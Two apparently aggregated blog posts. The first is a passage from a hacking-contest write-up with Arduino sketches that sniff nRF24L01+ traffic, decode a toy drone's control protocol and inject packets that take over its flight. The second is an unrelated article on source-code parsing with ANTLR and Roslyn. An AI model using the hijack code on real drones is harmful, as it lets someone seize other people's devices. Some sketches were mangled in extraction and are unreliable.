One of our packets could be detected by the shift to 0x5e25:


Everyone decides for themselves how to use it, but it is necessary to find out the length of the packet and the type of the used CRC. We created a utility that analyzes a file and tries to find a preamble, and then attempts to calculate the CRC for different payload lengths and addresses via two different methods (see the data sheet). We did it this way:


But later we realized that Python is only suitable for offline analysis, and is very difficult for it to “digest” data in real time even with a bitrate of 250 kbps, not to mention the higher speeds. This is why the second version in C that operates in real time was developed.


So we have payload, now we only need to examine Syma protocol.

Another Way: Arduino and nRF24L01+


This method, in contrast to the above, requires almost no knowledge in the field of radio, and is extremely cheap (Arduino is $2, nRF24L01+ -is $1, and approximately the same for the wire mini-USB and DuPont), but it requires some ingenuity. This is the method that we wanted the participants to reproduce.

The main problem is that nrf24l01+ does not have the promiscuous mode. However, the module has some strange features, e.g. the data sheet has an interesting thing:



If you paste 00 in this register, the address will be 2 bytes. Also, a preamble is typically transmitted and used for a receiver to adjust to a transmitter, and for this purpose more often transmitted as a preamble sequence of zeros and ones. And the second feature of the module nRF24L01+: it does not look for a preamble and does not use it, it looks for an address that is recorded as received address. If we look at the transmitting signal on the screenshots above, we will notice that before transmitting the preamble, the transmitter transmits the sound carrier. Experiments showed that nRF24L01+ often take it as 0x00 (or sometimes as 0xFF, and rarely as an accidental byte). Thus, using these undocumented features we can translate nRF24L01+ to the promiscuous mode by setting the length of the address to 2 bytes, and the address as 0x00AA or 0x0055. In some case, we will receive data shifted by 1 bit. Moreover, we can receive data without checking the CRC.

Now we have all the necessary information. Now we can use the RF24 library (github.com/TMRh20/RF24), though it has a flaw: in the file RF24.cpp of the function

void RF24::setAddressWidth(uint8_t a_width){
if(a_width -= 2){
write_register(SETUP_AW,a_width%4);
addr_width = (a_width%4) + 2;
}
}

the validity check should be removed:

void RF24::setAddressWidth(uint8_t a_width){
a_width -= 2;
write_register(SETUP_AW,a_width%4);
addr_width = (a_width%4) + 2;
}

Now we write a small sketch for Arduino (this example is for Mega, but it works for any other model, you just need to change CE_PIN, CSN_PIN on your own):

#include
#include
#include
#include

#define CE_PIN  53 /// Change it for your board
#define CSN_PIN 48 /// Change it for your board

RF24 radio(CE_PIN, CSN_PIN); 

const char tohex[] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
uint64_t pipe = 0x00AA;

byte buff[32];
byte chan=0;
byte len = 32;
byte addr_len = 2;

void set_nrf(){
  radio.setDataRate(RF24_250KBPS);
  radio.setCRCLength(RF24_CRC_DISABLED);
  radio.setAddressWidth(addr_len);
  radio.setPayloadSize(len);
  radio.setChannel(chan);
  radio.openReadingPipe(1, pipe);
  radio.startListening();  
}

void setup() {
  Serial.begin(2000000);
  printf_begin();
  radio.begin();
  set_nrf();
}

long t1 = 0;
long t2 = 0;
long tr = 0;

void loop() {
  byte in;
   if (Serial.available() >0) {
     in = Serial.read();
     if (in == 'w') {
      chan+=1;
      radio.setChannel(chan);
      Serial.print("\nSet chan: "); 
      Serial.print(chan);
     }
     if (in == 's') {
      chan-=1;
      radio.setChannel(chan);
      Serial.print("\nSet chan: "); 
      Serial.print(chan);
     }
     if (in == 'q') {
     Serial.print("\n"); 
     radio.printDetails();
     }  
   }
  while (radio.available()) {                      
    t2 = t1;
    t1 = micros();
    tr+=1;
    radio.read(&buff, sizeof(buff) );
    Serial.print("\n"); 
    Serial.print(tr);
    Serial.print("\tms: "); 
    Serial.print(millis());
    Serial.print("\tCh: ");
    Serial.print(chan);
    Serial.print("\tGet data: ");
    for (byte i=0; i
      Serial.print(tohex[(byte)buff[i]>>4]);
      Serial.print(tohex[(byte)buff[i]&0x0f]);      
    }    
  }
}

Now you can gather data from the channel on the serial port, the change is channel by sending a “w” and “s” to the port. Further handling can is performed in any convenient manner. We should note that the port speed is non-standard (2 Mbps) to allow Arduino to spend less time on I/O (do not forget that there is only 16 MHz).


After finding the channel and capturing the address should set the address as the receiver to filter the data:

uint64_t pipe = 0xa20009890fLL;
byte addr_len = 5;


Then we should run through all the channels and find where the given address is presented. Now we notice that 10, 11 and 12 bytes vary depending on the data, and they are followed by a sequence of random bytes (noise). We try to enable CRC16 (last two bytes) and change the length of the packet to 10 bytes:

byte len = 10;
radio.setCRCLength(RF24_CRC_16);


Yes! We were able to find all the necessary settings nRF24L01+, which are used by the panel, and it’s time to analyze the Syma protocol itself.

The Syma Protocol

It is not difficult to analyze it by recording some activity from the panel.

  • The first byte is the throttle value (throttle stick) 
  • The second byte is the elevator value (the pitch — tilt back and forth), where the high bit is the direction (forward or backwards) and the remaining 7 is the value.
  • The third byte is the rudder value (yaw — pivoting left and right), where the high bit is the direction (left or right) and the remaining 7 is the value.
  • The fourth byte is the aileron value (roll — leaning to the left and to the right), where the high bit is the direction and the remaining 7 is the value.
  • The tenth is the CRC, which is calculated as an XOR from the first 9 bytes + 0x55, understanding this is perhaps the most difficult part.

The remaining bytes could be left as those that were intercepted: they contain zero position adjustment values (trims), and a few flags for manipulating the camera.

Now we just need to create a valid package, for example to force the drone to spin on its axis counterclockwise: 92007f000040002400de

Below is a sketch of our interceptor from PHDays:


#include
#include
#include
#include

#define CE_PIN  48
#define CSN_PIN 53

//// syma
uint8_t chan[4] = {25,41,57,73}; 
const char tohex[] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
uint64_t pipe = 0xa20009890fLL; 

RF24 radio(CE_PIN, CSN_PIN); 
int8_t packet[10];
int joy_raw[7];
byte ch=0;

//// controls
uint8_t throttle = 0;
int8_t rudder = 0;
int8_t elevator = 0;
int8_t aileron = 0;

//// syma checksum
uint8_t checksum(){
    uint8_t sum = packet[0];
    for (int i=1; i < 9; i++) sum ^= packet[i];
    return (sum + 0x55);
}

//// initial
void setup() {
  //set nrf
  radio.begin();
  radio.setDataRate(RF24_250KBPS);
  radio.setCRCLength(RF24_CRC_16);
  radio.setPALevel(RF24_PA_MAX);
  radio.setAutoAck(false);
  radio.setRetries(0,0);
  radio.setAddressWidth(5);
  radio.openWritingPipe(pipe);
  radio.setPayloadSize(10);
  radio.setChannel(25);
  //set joystick
  pinMode(A0, INPUT);
  pinMode(A1, INPUT);
  pinMode(A2, INPUT);
  pinMode(A3, INPUT);
  pinMode(A4, INPUT);
  pinMode(A5, INPUT);
  pinMode(A6, INPUT);
  digitalWrite(A3, HIGH);
  digitalWrite(A4, HIGH);
  digitalWrite(A5, HIGH);
  digitalWrite(A6, HIGH);
  //init default data
  packet[0] = 0x00;
  packet[1] = 0x00;
  packet[2] = 0x00;
  packet[3] = 0x00;
  packet[4] = 0x00;
  packet[5] = 0x40;
  packet[6] = 0x00;
  packet[7] = 0x21;
  packet[8] = 0x00;
  packet[9] = checksum();
}

void read_logitech() {
  joy_raw[0] = analogRead(A0);
  joy_raw[1] = analogRead(A1);
  joy_raw[2] = analogRead(A2);
  joy_raw[3] = !digitalRead(A3);
  joy_raw[4] = !digitalRead(A4);
  joy_raw[5] = !digitalRead(A6);
  joy_raw[6] = !digitalRead(A5);
  //little calibration
  joy_raw[0] = map(joy_raw[0],150, 840, 255, 0)+10;
  joy_raw[0] = constrain(joy_raw[0], 0, 254);
  joy_raw[1] = map(joy_raw[1],140, 830, 0, 255);
  joy_raw[1] = constrain(joy_raw[1], 0, 254);
  joy_raw[2] = map(joy_raw[2],130, 720, 255, 0);
  joy_raw[2] = constrain(joy_raw[2], 0, 254);
}

//// main loop
void loop() {
  read_logitech();
  throttle = joy_raw[2];
  rudder = 64*joy_raw[4] - 64*joy_raw[5];
  elevator = joy_raw[1]-127;
  aileron = joy_raw[0]-127;
  radio.openWritingPipe(pipe);
  ch +=1;
  if (ch>3) ch = 0; 
  radio.setChannel(chan[ch]);      
  packet[0] = throttle;
  if (elevator < 0) packet[1] = abs(elevator) | 0x80; else packet[1] = elevator;
  if (rudder < 0) packet[2] = abs(rudder) | 0x80; else packet[2] = rudder;
  if (aileron < 0) packet[3] = abs(aileron) | 0x80; else packet[3] = aileron;
  packet[4] = 0x00;
  packet[5] = 0x40;
  packet[6] = 0x00;
  packet[7] = 0x21;
  packet[8] = 0x00;
  packet[9] = checksum();
  radio.write( packet, sizeof(packet) );
}

If you do not want to deal with the Arduino, you can create an interceptor on a Raspberry Pi.


You can find ready-made files here: github.com/chopengauer/nrf_analyze.

Participants and winners

During the two days, 15 attendees took part in the contest. There were more those who were interested, but most of them decided not to participate when they found out that it was not about hacking Wi-Fi. Many people are afraid to take on something new and strange, and this keeps the Internet of Things secure.

Participants included those who have built their wireless networks on nRF24L01+, and those who heard about them for the first time.

During the first day of one of the participants attempted to take control over the drone by recording a panel signal subsequently replaying by using SDR (a replay attack). But the drone just slightly twitched. This attack is useless because the drone used 4 channels with 48 MHz between the upper and the lower, and the impact on one channel is insufficient.

By the evening of the first day another participant had all the necessary knowledge about the features of the module (the two-byte address 0x00aa) and tried to scan the address from our panel, but the problem was that he got the data sheet of the nRF24L01 chip (the older version, without +), which does not support the bit rate of 250 kbps. Moreover, he refused using ready-made libraries for working with the module and worked directly with its registers.

The winner of the contest was Gleb Cherbov who managed to take the whole control over the drone by 4 p.m. of the second day. Other participants could not intercept the device’s address.

Contest Authors: Pavel Novikov and Artur Garipov, Positive Technologies

Theory and Practice of Source Code Parsing with ANTLR and Roslyn

$
0
0
PT Application Inspector provides several approaches to analysis of the source code written in different programming languages:
  • Search by signatures.
  • Exploring the properties of mathematical models derived from the static abstract interpretation of code.
  • Dynamic analysis of the deployed application and verification of the static analysis results.
This series of articles focuses on the structure and operation principles of the signature analysis module (PM, pattern matching). The key benefits of such an analyzer include high performance, simplicity of pattern description, and scalability across various languages. The disadvantage of this approach is that the module is not able to analyze complex vulnerabilities, which require developing high-level models of code execution.

The following requirements have been defined for the module under development:
  • Capability of working with multiple programming languages and the option to add new ones easily.
  • Functionality that allows analysis of the code containing syntactic and semantic errors.
  • Capability of describing patterns using a common programming language (DSL, domain specific language).
In this case, all the patterns describe flaws or vulnerabilities in the source code.
The process of code analysis could be divided into the following stages:
  1. Parsing into a language dependent representation (abstract syntax tree, AST).
  2. Converting AST to a language independent unified format (UAST).
  3. A direct comparison with the patterns described in the DSL.
This article focuses on the first stage that includes parsing, comparing functionalities and features of various parsers, as well as applying theoretical principles to practice using Java, PHP, PLSQL, TSQL and even C# grammars. Other stages will be discussed in future publications.

Theory of parsing

At the outset, the following question may arise: why do we need to build a unified AST or develop algorithms for graph comparison instead of using regular expressions? The point here is that not all patterns can be simply described using regular expressions. It should be noted that regular expressions in C# are as concise as context-free grammars due to named groups and reverse links. There is also an article from the PVS-Studio developers covering this subject. Moreover, the coherence in a unified AST allows using it to build the more complex representations of code execution, such as code property graph.

Terminology


Those already familiar with the theory of parsing may skip this section.
Parsing is a process of creating a structured representation of the source code. Typically, parsing is broken into two parts, lexing and parsing. The lexer groups the source code characters into notional sequences called lexemes. It will then identify the type of the lexeme (an identifier, a number, a string, etc.). The set of values of the lexeme and its type is called a token. If you have a look at the figure below, sp, =, 100 is the token. The parser converts a stream of tokens into the tree structure, which is called a parse tree. In this case, assign is one of the nodes of the tree. The abstract syntax tree (AST) is a high-level parse tree with "unimportant" tokens such as brackets or commas removed. However, some parsers combine parsing and lexing.


Lexer & Parser

There are some rules, which define AST nodes. The rules together are called the grammar of the language. Tools that generate code for a particular platform (runtime) to perform lexical analysis of grammar-based languages are called parser generators. Such as ANTLR, Bison, Coco/R. However, for some reason, the parser is often written manually. Roslyn can be an example of such tool. The advantages of a manual approach are that parsers tend to be more efficient and readable.

We have decided to develop this project using .NET technologies, then we have chosen Roslyn to perform the analysis of the C# code and ANTLR for other languages as it supports the .NET runtime and has more features compared to other alternatives.

Types of formal languages


There are 4 types of formal languages according to the Chomsky hierarchy:
  • Regular grammars: an
  • Context-free grammars: anbn
  • Context-sensitive grammars: anbncn
  • Turing complete.
Regular expressions describe only elementary statements for matching, which, however, cover the majority of tasks in everyday practice. Another advantage of regular expressions is that most programming languages support them. Complexity in both writing and parsing makes Turing complete languages unsuitable for computation in practice (for example, an esoteric programming language called Thue comes to mind).

Thus far, in fact all the syntax of modern programming languages can be defined by context-free grammars. If we compare context-free grammars and regular expressions in lay terms, the latter do not have a memory (are not able to perform calculations). And if we compare context-sensitive and context-free grammars, the latter do not remember the already applicable rules (are able to calculate only two things).

Moreover, the language may be context-free in one case and context-sensitive in the other. Given the semantics (i.e., consistency with the definitions used in the language and consistency of types in particular) the language may be considered as context-sensitive. For example, T a = new T(). The type in the constructor on the right must be the same as the one on the left. It is usually advisable to check the semantics after parsing. Still there are such syntactic constructions that cannot be parsed using context-free grammars, for example, Heredoc in PHP: $x = <<<EOL Hello world EOL; the EOL token (or line break) is a special character signifying the end of a line of text and the start of a new line, therefore it requires memorizing the value of the token being visite. This article focuses on the analysis of such context-free and context-sensitive languages.

ANTLR

This parser generator is an LL(*), it has existed for over 20 years and the 4th version was released in 2013. Now it’s under development on GitHub. This module allows users to create parsers in Java, C#, Python2, Python3, and JavaScript. C++, Swift, and Go are coming soon (hopefully). Well, I need to say, that it is simple enough to develop and debug grammars using this tool. Despite the fact that LL grammars do not allow for left-recursive grammar rules, ANTLR since version 4 will let you write the above mentioned rules (except for the rules with hidden or indirect left recursion). These rules are translated into ordinary rules during the parser generation. This reduces the time when writing expressions, for example, arithmetic ones:

expr
: expr '*' expr
| expr '+' expr
| expr '^' expr
| id
;
In addition, parsing performance is significantly improved by using the Adaptive LL algorithm (*). This algorithm combines the advantages of relatively slow GLL and GLR algorithms, which, however, are able to resolve cases of ambiguity (used in the analysis of natural languages) compared to fast LL recursive descent algorithms, which in turn are not able to resolve all problems with ambiguity. The idea of the used algorithm is based on pseudo-parallel running LL parsers on each rule, caching and choosing the right prediction (as opposed to the GLR where a number of alternatives is allowed). Thus, the algorithm is dynamic. Although the theoretical worst-case behavior
of this algorithm parsing is O(n4), the parsing rate for existing programming languages appears to be linear in practice. The 4th version also has an improved error recovery algorithm. Read more about the ANTLR 4 algorithms and differences with the other parsing algorithms in the following article: Adaptive LL(*) Parsing: The Power of Dynamic Analysis.

Roslyn


Roslyn is not just a parser; it is a fully-featured tool for parsing, analyzing and compiling C# code. It is also developed on GitHub, but it is more advanced than ANTLR. This article deals only with its parsing features, regardless of the semantics. Roslyn parses the code to fidelity, immutable, and thread safe tree. Fidelity is that such tree can be converted back into the same character-for-character code, including spaces, comments and preprocessor directives, even if there are some syntax errors. Immutability makes it easy to handle multiple-tree processing, as a "smart" copy of a tree (which is used only for storing the changes) is created in each separate stream. The above mentioned tree may consist of:
  • Syntax Node — a non-terminal node of the tree containing a few other nodes and displaying a certain structure. It may also contain an optional node (e.g., ElseClauseSyntax for if).
  • Syntax Token — a terminal node that represents a keyword, an identifier, a literal, or a punctuation mark.
  • Syntax Trivia — a terminal node that represents a space, a comment or a preprocessor directive (it can be easily removed without losing code information). Trivia does not have a parent. These nodes are critical when converting a tree back to code (e.g., during refactoring).

Parsing problems

The development of grammars and parsers introduces some challenges that should be considered.

Using keywords as identifiers


It often happens that some keywords may appear as identifiers during the parsing. For example, in the C # the async keyword placed before the method signature indicates that this method is asynchronous. But if this word will be used as the identifier of the var async = 42; variable, the code will be also valid. In ANTLR, this problem can be solved in two ways:
  1. Using a semantic predicate for the syntactic rule: async: {_input.LT(1).GetText() == "async"}? ID ; while the async token itself will not exist. This approach is bad because the grammar becomes dependent on runtime and looks ugly.
  2. Inserting the token into the id rule:
    ASYNC: 'async';
    ...
    id
    : ID
    ...
    | ASYNC;

Ambiguity


Natural language contains ambiguous expressions (like, "Flying planes can be dangerous"). Such constructions may also occur in a formal language. For example:

stat: expr ';' // expression statement
| ID '(' ')' ';' // function call statement;
;
expr: ID '(' ')'
| INT
;

However, contrary to natural languages, they are likely to be the result of improper grammars. ANTLR is not able to detect such ambiguity in the process of generating a parser, but if we set the LL_EXACT_AMBIG_DETECTION mode (as ALL is a dynamic algorithm), ambiguity can be defined during the process of parsing. Ambiguity may arise in both lexer and parser. The lexer generates a token for each of two identical tokens (see the example with identifiers). Yet, in languages where the ambiguity is acceptable (for example, C ++), you can use semantic predicates (code insertions) to resolve it, for example:
expr: { isfunc(ID) }? ID '(' expr ')' // func call with 1 arg
| { istype(ID) }? ID '(' expr ')' // ctor-style type cast of expr
| INT
| void
;
Sometimes the ambiguity can be fixed after a little reinvention of grammar. For example, there is a right shift bit operator RIGHT_SHIFT: '>>' in C#: two angle brackets can also be used to describe a generics class: List>. If we define the >> as a token, the construction of two lists would never be parsed because the parser will assume that there is a >> operator instead of two closing brackets. To resolve this you only need to put the RIGHT_SHIFT token aside. At the same time, we can leave the LEFT_SHIFT: '<<' token as-is, because such a sequence of characters would not take place during the parsing of a valid code.

Yet, we have not performed a detailed analysis of whether there is any ambiguity in grammars developed using our module.

Handling whitespaces, comments


Another parsing problem is handling comments. The disadvantage here is that the comments being included into the grammar make it overcomplicated; in fact, each node will contain comments. However, we cannot simply eliminate the comments, because they may contain some relevant information. ANTLR uses the so-called channels to handle the comments, these channels isolate a lot of comments from other tokens:Comment: ~[\r\n?]+ -> channel(PhpComments);

In Roslyn the comments are included into the tree nodes, but they belong to a special type called Syntax Trivia. You can get a list of trivial tokens associated with a certain ordinary token in both ANTLR and Roslyn. ANTLR has a method for the token with index i in the stream, which returns all tokens on a specified channel to the right or to the left: getHiddenTokensToRight(int tokenIndex, int channel),getHiddenTokensToRight(int tokenIndex, int channel). Roslyn adds such tokens to the terminal Syntax Token.

In order to retrieve all the comments in ANTLR you can get all tokens on a specified channel:lexer.GetAllTokens().Where(t => t.Channel == PhpComments), in Roslyn you can get all DescendantTrivia for the root node with the following
SyntaxKind: SingleLineCommentTriviaMultiLineCommentTrivia,SingleLineDocumentationCommentTrivia,MultiLineDocumentationCommentTriviaDocumentationCommentExteriorTriviaXmlComment.

Handling white spaces and comments is one of the reasons for which the code, for example, LLVM, cannot be used for the analysis: they will be just omitted. Apart from handling comments, even handling of whitespace is a very important part. For example, detecting errors in a single if statement (this example was taken from an article entitled PVS-Studio delved into the FreeBSD kernel):

case MOD_UNLOAD:
if (via_feature_rng & VIA_HAS_RNG)
random_nehemiah_deinit();
random_source_deregister(&random_nehemiah);

Handling parse errors



An important capability of each parser is error handling. The reasons are as follows:
  • The parsing process should not be interrupted only because of a single mistake, it must recover properly and continue to parse the code (for instance, after missing a semicolon).
  • Search for relevant error and its location, instead of searching multiple irrelevant errors.

ANTLR errors

The following parsing errors are present in ANTLR:
  • Token recognition error (Lexer no viable alt). Is the only lexical error, indicating the absence of the rule used to create the token from an existing lexeme:

    class # { int i; } — # is the above mentioned lexeme.
  • Missing token. In this case, ANTLR inserts the missing token to a stream of tokens, marks it as missing, and continues parsing as if this token exists.

    class T { int f(x) { a = 3 4 5; } } — } is the above mentioned token.
  • Extraneous token. ANTLR marks a token as incorrect and continues parsing as if this token doesn’t exist: The example of such a token will be the first ;

    class T ; { int i; }
  • Mismatched input. In this case "panic mode" will be initiated, a set of input tokens will be ignored, and the parser will wait for a token from the synchronizing set. The 4th and 5th tokens of the following example are ignored and ; is the synchronizing token

    class T { int f(x) { a = 3 4 5; } }
  • No viable alternative input. This error describes all other possible parsing errors.

    class T { int ; }
Furthermore, errors can be handled manually by adding an error alternative to the rule:
function_call
: ID '(' expr ')'
| ID '(' expr ')' ')' {notifyErrorListeners("Too many parentheses");}
| ID '(' expr {notifyErrorListeners("Missing closing ')'");}
;
Moreover, ANTLR 4 allows you to use your own error handling mechanism. This option may be used to increase the performance of the parser: first, code is parsed using a fast SLL algorithm, which, however, may parse the ambiguous code in an improper way. If this algorithm reveals at least a single error (this may be an error in the code or ambiguity), the code is parsed using the complete, but less rapid ALL-algorithm. Of course, an actual error (e.g., the missed semicolon) will always be parsed using LL, but the number of such files is less compared to ones without any errors.
Maximizing performance when parsing in ANTLR:
// try with simpler/faster SLL(*)
parser.getInterpreter().setPredictionMode(PredictionMode.SLL);
// we don't want error messages or recovery during first try
parser.removeErrorListeners();
parser.setErrorHandler(newBailErrorStrategy());
try {
parser.startRule();
// if we get here, there was no syntax error and SLL(*) was enough;
// there is no need to try full LL(*)
}
catch (ParseCancellationException ex) { // thrown by BailErrorStrategy
tokens.reset(); // rewind input stream
parser.reset();
// back to standard listeners/handlers
parser.addErrorListener(ConsoleErrorListener.INSTANCE);
parser.setErrorHandler(newDefaultErrorStrategy());
// full now with full LL(*)
parser.getInterpreter().setPredictionMode(PredictionMode.LL);
parser.startRule();
}


Roslyn errors


The following parsing errors are present in Roslyn:
  • Missing syntax; Roslyn completes the corresponding node with the IsMissing = true property value (a common example — Statement without a semicolon).
  • Incomplete member; a separate node IncompleteMember is created.
  • Incorrect value of the numeric, string, or character literal (e.g., a too long value, an empty char): A separate node with Kind equal toNumericLiteralTokenStringLiteralToken, or CharacterLiteralToken is created.
  • Excessive syntax (e.g., an accidentally typed character): A separate node with Kind = SkippedTokensTrivia is created.
The following code fragment demonstrates these errors (You can explore the features of Roslyn using the Visual Studio plugin Syntax Visualizer):
namespace App
{
class Program
{
; // Skipped Trivia
static void Main(string[] args)
{
a // Missing ';'
ulong ul = 1lu; // Incorrect Numeric
string s = """; // Incorrect String
char c = ''; // Incorrect Char
}
}

class bControl flow
{
c // Incomplete Member
}
}

These carefully selected types of syntax errors in Roslyn allows converting the tree with any number of errors character by character to code.

From theory to practice



Phptsqlplsql grammars illustrating the above theory were developed and maked open-source. PHP and SQL parsers use these grammars. In order to parse Java code we used the already existing java and java8 grammars. We have also refined the C#grammar (for versions 5 and 6) used to compare parsers based on Roslyn and ANTLR. Below you will find the most interesting aspects of developing and using these grammars. Although SQL-based languages are regarded as declarative rather than imperative, T-SQL and PL/SQL extensions provide support for imperative programming (Control flow). Our source code analyzer is mainly being developed for these aspects.

Java- and Java8 grammars


In most cases, Java 7-based parser is faster than Java 8, unless there is deep recursion, e.g., parsing of ManyStringConcatenation.java file takes far longer and requires more memory resources. I would like to note that this is not an artificial example; we really came across such "spaghetti code". As it turned out, the problem is caused by left-recursive grammar rules in expression. Java 8 grammar contains only primitive recursive rules. Primitive recursive rules differ from ordinary recursive rules in the way they refer to themselves in the left or right side of the alternative, but not in both simultaneously. An example of the ordinary recursive expression:
expression
: expression ('*'|'/') expression
| expression ('+'|'-') expression
| ID
;
The following rules are obtained after converting the rules above to primitive left-recursive:
expression
: multExpression
| expression ('+'|'-') multExpression
;
multExpression
: ID
| multExpression ('*'|'/') ID
;
Or even to non-recursive ones (however, it is not so easy to handle expressions after parsing, because they are no longer binary):
expression
: multExpression (('+'|'-') multExpression)*
;
If the operation has right associativity (e.g., exponentiation), primitive right-recursive are used:
expression
: expression '^' expression
| ID
;
powExpression
: ID '^' powExpression
| ID
;
On the one hand, conversion of left-recursive rules allows us to address the problem of excessive memory consumption and poor performance for rare files with a large number of similar expressions, on the other - brings performance issues when processing other files. It is therefore advisable to use primitive recursion for expressions, which may be deep (e.g., the concatenation of strings), and ordinary recursion for all other cases (e.g., the comparison of numbers).

PHP grammar


Phalanger allows parsing PHP code on .NET plarform. However, we are not satisfied with the fact that this project is actually not developed and provides no Visitor interface for traversing the AST nodes (the only interface presented is the Walker). It was therefore agreed to develop PHP grammar for ANTLR using our own resources.

Case insensitive keywords


As far as is known, all tokens in PHP, except for the names of variables (which begin with '$'), are case-insensitive. In ANTLR case insensitivity can be implemented in two ways:
  1. Declaring fragment lexical rules to define all the Latin characters and using them as follows:
    Abstract:           A B S T R A C T;
    Array: A R R A Y;
    As: A S;
    BinaryCast: B I N A R Y;
    BoolType: B O O L E A N | B O O L;
    BooleanConstant: T R U E | F A L S E;
    ...
    fragment A: [aA];
    fragment B: [bB];
    ...
    fragment Z: [zZ];
    An ANTLR fragment is a part of the token, which can be used in other token, but it is not a token itself. It is a "syntactic sugar" for describing tokens. Without the use of fragments, the first token can be written as Abstract: [Aa] [Bb] [Ss] [Tt] [Rr] [Aa] [Cc] [Tt]. The advantage of this approach is that the generated lexer is independent of the runtime since the characters in upper and lower cases are declared directly in the grammar. The downside is that the lexer performance achieved in this approach is lower than in the second approach.
  2. Converting the entire input stream of characters to the lower (or upper) case and starting the lexer, in which all the tokens described using this case. However, you need to perform this conversion for each particular runtime (Java, C#, JavaScript, Python), as described in Implement a custom File or String Stream and Override LA. Under this approach, it is difficult to make some tokens case-sensitive and other case-insensitive.
The first approach is used in the developed PHP grammar since lexical analysis usually takes less time than syntactical. Despite the fact that the grammar is still dependent from the runtime, this approach makes grammar porting to other runtimes easier. Furthermore, we created the Pull Request RFC Case Insensitivity Proof of Concept to facilitate the description of case-insensitive tokens.

Lexical modes for PHP, HTML, CSS, and JavaScript

It is commonly known that PHP code inclusions may be placed anywhere in the HTML code. The same HTML code may include CSS and JavaScript code (these blocks of embedded code are known as "islands"). For example, the following code (using Alternative Syntax) is valid:


or


Fortunately, ANTLR provides us with a mechanism called "modes", which allow to switch between different sets of tokens under certain conditions. For example, the SCRIPT and STYLE modes were designed to generate a flow of tokens for JavaScript and CSS (in fact, they are simply ignored in this grammar). HTML tokens are generated in the DEFAULT_MODE. It is worth noting that it is possible to implement the support for Alternative Syntax in ANTLR without adding the target code to the lexer. i.e.: nonEmptyStatement includes the inlineHtml rule, which, in turn, includes the tokens received in the DEFAULT_MODE:

nonEmptyStatement
: identifier ':'
| blockStatement
| ifStatement
| ...
| inlineHtml
;
...

inlineHtml
: HtmlComment* ((HtmlDtd | htmlElement) HtmlComment*)+
;

Complex context sensitive statements

We should mention that although ANTLR supports only context-free grammars, there are also the so-called "actions" containing the arbitrary code, which extend the number of languages to at least context-dependent ones. Such code inclusions allow implementing parsing of Heredoc and some other structures:

T-SQL grammar


Despite the common root «SQL», T-SQL (MSSQL) and PL/SQL grammars differ greatly from each other.

It would be nice to stay off the development of our own parser for this complex language. Nevertheless, the existing parsers did not meet the criteria of total coverage and relevance (e.g., grammar for the deprecated GOLD parser) and have closed source code (General SQL Parser). Finally, it was decided to recover TSQL grammar from the MSDN documentation. The result was worth it: the grammar covers many common syntactic constructions, looks neat, stays independent of the runtime, and it has been tested on SQL examples from MSDN. The complexity of the development was that some tokens in the grammar are optional. For example, a semicolon. In this case, error recovery during parsing is not so smooth.

PL/SQL grammar


Refinement of PL/SQL grammar took even less time, because the very grammar had already existed under ANTLR3. The main difficulty was the fact that it had been developed using the java-runtime. Most Java code insertions had been removed, since you can build AST without using them (as mentioned earlier, the semantics can be checked at another stage). The following insertions

decimal_key
: {input.LT(1).getText().equalsIgnoreCase("decimal")}? REGULAR_ID

were replaced by the fragment tokens:

decimal_key: D E C I M A L, as described above.

C# grammar


Strange as it seems, but the refinement of the grammar supporting 5 and 6 language versions, was quite a difficult task. The major concerns were the string interpolation and proper processing of preprocessor directives. Because these things are context-dependent, the lexer and the parser for processing directives turned out to be dependent of the runtime.

Preprocessor directives


C# allows you to compile the following code properly (code after the first directive cannot be compiled, still it is not included into the compilation since false is never satisfied).

#if DEBUG && false
Sample not compilied wrong code
var 42 = a + ;
#else
// Compilied code
var x = a + b;
#endif

In order to be processed correctly, the code is split to an array of tokens located in the default COMMENTS_CHANNEL and DIRECTIVE channels. The codeTokens list is also created; it contains the proper tokens for parsing. Then, the preprocessor parser calculates the value for the directive of preprocessor tokens. Special attention shall be given to the fact that ANTLR also allows you to write the code to calculate the value of complex logical expressions directly in the grammar. For more details on the implementation, check the following link CSharpPreprocessorParser.g4. A value of true or false is calculated only for #if#elif, and #else, directives, all of the remaining directives always return true, because they do not affect whether or not the following code is to be compiled. This parser also allows you to find the default Conditional Symbols (defined asDEBUG by default).

After the directive value was calculated and it gets a true value, the subsequent tokens are added to the codeTokens list, otherwise they are skipped. Such an approach allows to ignore the wrong tokens (like var 42 = a + ; in this example) at the stage of parsing. The parsing process is described as follows: CSharpAntlrParser.cs.

String interpolation


This feature was very challenging to develop since the closing curly bracket may mean a part of an interpolation expression or exit of the expression mode. A colon can also be part of the expression, and could mean the end of the expression and description of the output format (for example, #0.##). Additionally, such strings may be regular, verbatim or nested. For more details about syntax see the MSDN page.

The above-described items are shown in the following code, which is valid syntactically:
s = $"{p.Name} is \"{p.Age} year{(p.Age == 1 ? "" : "s")} old";
s = $"{(p.Age == 2 ? $"{new Person { } }" : "")}";
s = $@"\{p.Name}
""\";
s = $"Color [ R={func(b: 3):#0.##}, G={G:#0.##}, B={B:#0.##}, A={A:#0.##} ]";
The interpolation of strings has been implemented using the stack for calculating the current level of the interpolation string and brackets. All of this is implemented in CSharpLexer.g4.

Testing


Correctness of ANTLR parsers


Obviously, there is no need to test the parsing correctness of the Roslyn parser. On the other hand, we paid a lot of attention to testing of the ANTLR parser.

Performance of ANTLR and Roslyn parsers


Testing was conducted in a single-threaded mode, in release configuration without the debugger attached. ANTLR 4 4.5.0-alpha003 and Roslyn (Microsoft.CodeAnalysis) 1.1.1 were tested.

WebGoat.PHP


The number of processed files — 885. The total number of strings — 137 248, characters — 4 461 768.

Approximate time - 00:00:31 sec (55% by lexer, 45% by parser).

PL/SQL Samples


The number of processed files — 175. The total number of strings — 1 909, characters — 55 741.
Approximate time < 1 sec. (5% by lexer, 95% by parser).

CoreFX-1.0.0-rc2


The number of processed files — 7329. The total number of strings — 2 286 274, characters — 91 132 116.

Approximate time: * Roslyn: 00:00:04 sec * ANTLR: 00:00:24 sec. (12% by lexer, 88% by parser)

Roslyn-1.1.1


The number of processed files — 6527. The total number of strings — 1 967 672, characters — 74 319 082.

Approximate time: * Roslyn: 00:00:03 sec * ANTLR: 00:00:16 sec. (12% by lexer, 88% by parser)
According to the testing results achieved with CoreFX and Roslyn, we may conclude that the developed C# parser on ANTLR is less five times slower than the Roslyn parser, which suggests the a great quality of the last-named. It’s understood that the parser created in a week as a kitchen-table effort will hardly ever be able to compete with such giants of the market like Roslyn, but it can be used to parse C# code on Java, Python, or JavaScript (and other future languages), because the parsing speed is still fast.

